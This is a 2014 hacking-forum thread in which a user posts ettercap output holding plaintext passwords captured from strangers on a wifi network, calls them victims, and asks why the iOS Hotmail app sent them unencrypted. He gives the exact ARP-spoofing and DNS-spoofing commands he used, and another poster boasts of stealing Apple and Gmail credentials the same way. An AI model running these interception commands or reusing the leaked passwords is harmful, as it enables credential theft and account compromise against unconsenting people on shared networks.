Author Topic: IOS Hotmail app packets in plain text?  (Read 891 times)

0 Members and 1 Guest are viewing this topic.

Offline Comm4nd0

  • /dev/null
  • *
  • Posts: 19
  • Cookies: -1
    • View Profile
IOS Hotmail app packets in plain text?
« on: November 27, 2014, 01:36:07 pm »
Hi all,

I got the following output from ettercap on a wifi network.

Code: [Select]
HTTP : 157.56.121.XXX:443 -> USER: XXXXXXXXX@hotmail.co.uk  PASS: datasafe3929  INFO: dub402-m.hotmail.com/Microsoft-Server-ActiveSync?User=XXXXX@hotmail.co.uk&DeviceId=ApplXXX

HTTP : 134.170.0.XXX:443 -> USER: XXXXXXXXX@hotmail.com  PASS: jordan60  INFO: blu403-m.hotmail.com/Microsoft-Server-ActiveSync?User=XXXXXXX@hotmail.com&DeviceId=ApplDXXX

HTTP : 157.56.121.XXX:443 -> USER: XXXXXXXXX@live.co.uk  PASS: Liverpool5891  INFO: dub402-m.hotmail.com/Microsoft-Server-ActiveSync?User=XXXXXX@live.co.uk&DeviceId=ApplDXXXX

What's your opinion on this? Do you think their hotmail app is using plain text rather that ssl?

Obviously i've changed some of the info to protect the victims.

Comm4nd0

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: IOS Hotmail app packets in plain text?
« Reply #1 on: November 27, 2014, 01:38:44 pm »
Are you sure you didnt use SSL MITM?
What are the ettercap switches you used?
« Last Edit: November 27, 2014, 01:38:59 pm by proxx »
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline Comm4nd0

  • /dev/null
  • *
  • Posts: 19
  • Cookies: -1
    • View Profile
Re: IOS Hotmail app packets in plain text?
« Reply #2 on: November 27, 2014, 01:50:36 pm »
Code: [Select]
sudo echo 1 > /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sudo ettercap -Tqi wlan0 -M arp:remote -P dns_spoof // //

I'm pretty new to ettercap to be honest but i'm pretty sure i didn't specify SSL.

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: IOS Hotmail app packets in plain text?
« Reply #3 on: November 27, 2014, 02:10:37 pm »
I see, looks like you are not forwardig traffic over port 443 thus the app falls back to HTTP (-S)
Could be wrong and short on time.
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline Comm4nd0

  • /dev/null
  • *
  • Posts: 19
  • Cookies: -1
    • View Profile
Re: IOS Hotmail app packets in plain text?
« Reply #4 on: November 27, 2014, 02:15:35 pm »
I see, looks like you are not forwardig traffic over port 443 thus the app falls back to HTTP (-S)
Could be wrong and short on time.

Could be that's if stumbled upon an error with their app that could be exploited? Unfortunately i don't have a Crapple phone to test it on.

Offline d4rkcat

  • Knight
  • **
  • Posts: 287
  • Cookies: 115
  • He who controls the past controls the future. He who controls the present controls the past.
    • View Profile
    • Scripts
Re: IOS Hotmail app packets in plain text?
« Reply #5 on: November 27, 2014, 02:48:08 pm »
iOs is shit.
I used to pull apple and gmail account creds this way from the iCrap phone.
Jabber (OTR required): thed4rkcat@einfachjabber.de    Email (PGP required): thed4rkcat@yandex.com    PGP Key: here and here     Blog

<sofldan> not asking for anyone to hold my hand uber space shuttle door gunner guy.